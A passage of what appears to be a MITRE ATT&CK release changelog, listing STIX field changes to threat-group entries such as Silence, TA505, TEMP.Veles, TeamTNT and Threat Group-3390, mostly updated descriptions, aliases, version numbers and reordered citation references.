| external_references[14]['url'] | https://www.justice.gov/opa/page/file/1098481/download | https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory |
| external_references[15]['source_name'] | F-Secure BlackEnergy 2014 | USDOJ Sandworm Feb 2020 |
| external_references[15]['description'] | F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016. | Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020. |
| external_references[15]['url'] | https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf | https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html |
| external_references[16]['source_name'] | InfoSecurity Sandworm Oct 2014 | US District Court Indictment GRU Unit 74455 October 2020 |
| external_references[16]['description'] | Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017. | Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020. |
| external_references[16]['url'] | https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/ | https://www.justice.gov/opa/press-release/file/1328521/download |
| external_references[17]['source_name'] | Dragos ELECTRUM | Secureworks IRON VIKING |
| external_references[17]['description'] | Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020. | Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020. |
| external_references[17]['url'] | https://www.dragos.com/resource/electrum/ | https://www.secureworks.com/research/threat-profiles/iron-viking |
| external_references[18]['source_name'] | Secureworks IRON VIKING | UK NCSC Olympic Attacks October 2020 |
| external_references[18]['description'] | Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020. | UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020. |
| external_references[18]['url'] | https://www.secureworks.com/research/threat-profiles/iron-viking | https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games |
| x_mitre_version | 2.1 | 2.2 |
| Description |
|---|
| [Silence](https://attack.mitre.org/groups/G0091) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-05-26 19:54:55.580000+00:00 | 2022-06-02 20:13:56.605000+00:00 |
| aliases[1] | WHISPER SPIDER | Whisper Spider |
| external_references[1]['source_name'] | Silence | Whisper Spider |
| external_references[1]['description'] | (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) | (Citation: Crowdstrike GTR2020 Mar 2020) |
| external_references[2]['source_name'] | WHISPER SPIDER | Silence |
| external_references[2]['description'] | (Citation: Crowdstrike GTR2020 Mar 2020) | (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) |
| external_references[3]['source_name'] | Cyber Forensicator Silence Jan 2019 | Crowdstrike GTR2020 Mar 2020 |
| external_references[3]['description'] | Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019. | Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. |
| external_references[3]['url'] | https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/ | https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf |
| external_references[5]['source_name'] | Crowdstrike GTR2020 Mar 2020 | Cyber Forensicator Silence Jan 2019 |
| external_references[5]['description'] | Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. | Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019. |
| external_references[5]['url'] | https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf | https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/ |
| Description |
|---|
| [Suckfly](https://attack.mitre.org/groups/G0039) is a China-based threat group that has been active since at least 2014. (Citation: Symantec Suckfly March 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 19:21:39.854000+00:00 | 2022-04-15 16:27:38.682000+00:00 |
| external_references[2]['description'] | DiMaggio, J.. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016. | DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016. |
| external_references[3]['description'] | DiMaggio, J.. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016. | DiMaggio, J. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016. |
| Old Description | New Description |
|---|---|
| [TA505](https://attack.mitre.org/groups/G0092) is a financially motivated threat group that has been active since at least 2014. The group is known for frequently changing malware and driving global trends in criminal malware distribution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019) | [TA505](https://attack.mitre.org/groups/G0092) is a cyber criminal group that has been active since at least 2014. [TA505](https://attack.mitre.org/groups/G0092) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop](https://attack.mitre.org/software/S0611).(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA505)(Citation: Korean FSI TA505 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 20:27:57.195000+00:00 | 2022-10-13 16:17:20.601000+00:00 |
| description | [TA505](https://attack.mitre.org/groups/G0092) is a financially motivated threat group that has been active since at least 2014. The group is known for frequently changing malware and driving global trends in criminal malware distribution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019) | [TA505](https://attack.mitre.org/groups/G0092) is a cyber criminal group that has been active since at least 2014. [TA505](https://attack.mitre.org/groups/G0092) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop](https://attack.mitre.org/software/S0611).(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA505)(Citation: Korean FSI TA505 2020) |
| external_references[2]['source_name'] | Proofpoint TA505 Sep 2017 | Korean FSI TA505 2020 |
| external_references[2]['description'] | Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019. | Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022. |
| external_references[2]['url'] | https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter | https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory= |
| external_references[3]['source_name'] | Proofpoint TA505 June 2018 | IBM TA505 April 2020 |
| external_references[3]['description'] | Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019. | Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020. |
| external_references[3]['url'] | https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times | https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/ |
| external_references[4]['source_name'] | Proofpoint TA505 Jan 2019 | Proofpoint TA505 Sep 2017 |
| external_references[4]['description'] | Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019. | Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019. |
| external_references[4]['url'] | https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505 | https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter |
| external_references[5]['source_name'] | IBM TA505 April 2020 | Proofpoint TA505 June 2018 |
| external_references[5]['description'] | Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020. | Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019. |
| external_references[5]['url'] | https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/ | https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times |
| x_mitre_version | 1.3 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Proofpoint TA505 Jan 2019', 'description': 'Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505'} | |
| external_references | {'source_name': 'NCC Group TA505', 'description': 'Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.', 'url': 'https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/'} |
| Description |
|---|
| [TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://attack.mitre.org/software/S0609), a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Dragos Threat Intelligence'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://dragos.com/resource/xenotime/ |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:49:09.631000+00:00 | 2022-05-24 16:22:20.856000+00:00 |
| external_references[2]['source_name'] | XENOTIME | Dragos Xenotime 2018 |
| external_references[2]['description'] | The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind TRITON .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 ) | Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019. |
| external_references[3]['source_name'] | FireEye TRITON 2019 | FireEye TEMP.Veles 2018 |
| external_references[3]['description'] | Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019. | FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html | https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html |
| external_references[4]['source_name'] | FireEye TEMP.Veles 2018 | FireEye TEMP.Veles 2018 |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html | https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html |
| external_references[5]['source_name'] | FireEye TEMP.Veles JSON April 2019 | FireEye TRITON 2019 |
| external_references[5]['description'] | Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019. | Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019. |
| external_references[5]['url'] | https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html | https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html |
| external_references[6]['source_name'] | Dragos Xenotime 2018 | FireEye TEMP.Veles JSON April 2019 |
| external_references[6]['description'] | Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019. | Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019. |
| external_references[6]['url'] | https://dragos.com/resource/xenotime/ | https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html |
| external_references[8]['source_name'] | FireEye TEMP.Veles 2018 | XENOTIME |
| external_references[8]['description'] | FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019. | The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609) .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 ) |
| Old Description | New Description |
|---|---|
| [TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments. (Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021) | [TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.(Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 18:47:18.824000+00:00 | 2022-10-19 21:35:03.147000+00:00 |
| description | [TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments. (Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021) | [TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.(Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021) |
| external_references[1]['source_name'] | Palo Alto Black-T October 2020 | ATT TeamTNT Chimaera September 2020 |
| external_references[1]['description'] | Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021. | AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021. |
| external_references[1]['url'] | https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/ | https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera |
| external_references[2]['source_name'] | Lacework TeamTNT May 2021 | Cado Security TeamTNT Worm August 2020 |
| external_references[2]['description'] | Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 22, 2021. | Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021. |
| external_references[2]['url'] | https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/ | https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/ |
| external_references[3]['source_name'] | Intezer TeamTNT September 2020 | Unit 42 Hildegard Malware |
| external_references[3]['description'] | Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021. | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. |
| external_references[3]['url'] | https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/ | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ |
| external_references[4]['source_name'] | Cado Security TeamTNT Worm August 2020 | Trend Micro TeamTNT |
| external_references[4]['description'] | Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021. | Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021. |
| external_references[4]['url'] | https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/ | https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf |
| external_references[5]['source_name'] | Unit 42 Hildegard Malware | Intezer TeamTNT September 2020 |
| external_references[5]['description'] | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. | Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021. |
| external_references[5]['url'] | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ | https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/ |
| external_references[6]['source_name'] | Trend Micro TeamTNT | Intezer TeamTNT Explosion September 2021 |
| external_references[6]['description'] | Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021. | Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021. |
| external_references[6]['url'] | https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf | https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf |
| external_references[7]['source_name'] | ATT TeamTNT Chimaera September 2020 | Aqua TeamTNT August 2020 |
| external_references[7]['description'] | AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021. | Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021. |
| external_references[7]['url'] | https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera | https://blog.aquasec.com/container-security-tnt-container-attack |
| external_references[8]['source_name'] | Aqua TeamTNT August 2020 | Palo Alto Black-T October 2020 |
| external_references[8]['description'] | Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021. | Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021. |
| external_references[8]['url'] | https://blog.aquasec.com/container-security-tnt-container-attack | https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/ |
| external_references[9]['source_name'] | Intezer TeamTNT Explosion September 2021 | Lacework TeamTNT May 2021 |
| external_references[9]['description'] | Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021. | Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 22, 2021. |
| external_references[9]['url'] | https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf | https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/ |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Darin Smith, Cisco |
| Old Description | New Description |
|---|---|
| [Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims. (Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, and manufacturing sectors. (Citation: SecureWorks BRONZE UNION June 2017) (Citation: Securelist LuckyMouse June 2018) | [Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims.(Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Securelist LuckyMouse June 2018)(Citation: Trend Micro DRBControl February 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Daniyal Naeem, BT Security', 'Kyaw Pyiyt Htet, @KyawPyiytHtet'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 19:21:39.120000+00:00 | 2022-04-11 18:05:20.983000+00:00 |
| description | [Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims. (Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, and manufacturing sectors. (Citation: SecureWorks BRONZE UNION June 2017) (Citation: Securelist LuckyMouse June 2018) | [Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims.(Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Securelist LuckyMouse June 2018)(Citation: Trend Micro DRBControl February 2020) |
| external_references[1]['description'] | (Citation: Dell TG-3390) (Citation: Hacker News LuckyMouse June 2018) | (Citation: Dell TG-3390)(Citation: Hacker News LuckyMouse June 2018) |
| external_references[2]['description'] | (Citation: Dell TG-3390) (Citation: Nccgroup Emissary Panda May 2018) (Citation: Hacker News LuckyMouse June 2018) | (Citation: Dell TG-3390)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Hacker News LuckyMouse June 2018) |
| external_references[3]['description'] | (Citation: Gallagher 2015) (Citation: Nccgroup Emissary Panda May 2018) (Citation: Securelist LuckyMouse June 2018) (Citation: Hacker News LuckyMouse June 2018)(Citation: Unit42 Emissary Panda May 2019) | (Citation: Gallagher 2015)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Unit42 Emissary Panda May 2019)(Citation: Trend Micro Iron Tiger April 2021) |
| external_references[4]['source_name'] | BRONZE UNION | Iron Tiger |
| external_references[4]['description'] | (Citation: SecureWorks BRONZE UNION June 2017) (Citation: Nccgroup Emissary Panda May 2018) | (Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021) |
| external_references[5]['description'] | (Citation: Nccgroup Emissary Panda May 2018) (Citation: Securelist LuckyMouse June 2018) (Citation: Hacker News LuckyMouse June 2018) | (Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021) |
| external_references[6]['source_name'] | Iron Tiger | LuckyMouse |
| external_references[6]['description'] | (Citation: Hacker News LuckyMouse June 2018) | (Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021) |
| external_references[7]['source_name'] | LuckyMouse | BRONZE UNION |
| external_references[7]['description'] | (Citation: Securelist LuckyMouse June 2018) (Citation: Hacker News LuckyMouse June 2018) | (Citation: SecureWorks BRONZE UNION June 2017)(Citation: Nccgroup Emissary Panda May 2018) |
| external_references[8]['source_name'] | Dell TG-3390 | Earth Smilodon |
| external_references[8]['description'] | Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018. | (Citation: Trend Micro Iron Tiger April 2021) |
| external_references[10]['source_name'] | Securelist LuckyMouse June 2018 | Dell TG-3390 |
| external_references[10]['description'] | Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018. | Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018. |
| external_references[10]['url'] | https://securelist.com/luckymouse-hits-national-data-center/86083/ | https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage |
| external_references[11]['source_name'] | Hacker News LuckyMouse June 2018 | Unit42 Emissary Panda May 2019 |
| external_references[11]['description'] | Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018. | Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019. |
| external_references[11]['url'] | https://thehackernews.com/2018/06/chinese-watering-hole-attack.html | https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ |
| external_references[12]['source_name'] | Nccgroup Emissary Panda May 2018 | Gallagher 2015 |
| external_references[12]['description'] | Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018. | Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016. |
| external_references[12]['url'] | https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/ | http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ |
| external_references[13]['source_name'] | Gallagher 2015 | Hacker News LuckyMouse June 2018 |
| external_references[13]['description'] | Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016. | Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018. |
| external_references[13]['url'] | http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ | https://thehackernews.com/2018/06/chinese-watering-hole-attack.html |
| external_references[14]['source_name'] | Unit42 Emissary Panda May 2019 | Securelist LuckyMouse June 2018 |
| external_references[14]['description'] | Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019. | Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018. |
| external_references[14]['url'] | https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/ | https://securelist.com/luckymouse-hits-national-data-center/86083/ |
| x_mitre_version | 1.5 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | Earth Smilodon | |
